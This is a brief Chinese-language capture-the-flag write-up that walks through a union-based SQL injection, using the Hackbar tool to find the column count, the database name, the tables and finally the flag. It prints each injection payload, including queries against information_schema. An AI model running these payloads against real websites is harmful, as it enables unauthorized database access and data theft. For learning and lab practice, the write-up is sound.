工具
使用Hackbar工具,安装参考hackbar安装教程。
原题
解题过程
解题需要先判断注入点,然后依次通过注入点找到服务器数据库的名字、列的名字,最后找到存储在数据库中的flag。
先按照题目的提示输入一个“1”看看结果。搜索语句和两个结果都看到了。
库有两列。
order by 2
-1 union select 1,2
下面就要找出数据库的名字。这就知道了,数据库叫sqli。
-1 union select database(),2
接下来找列名(用database()好像不用知道数据库名)。现在我们知道第一
列就叫flag了。
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
往flag列中查找flag即可。
-1 union select 8,flag from sqli.flag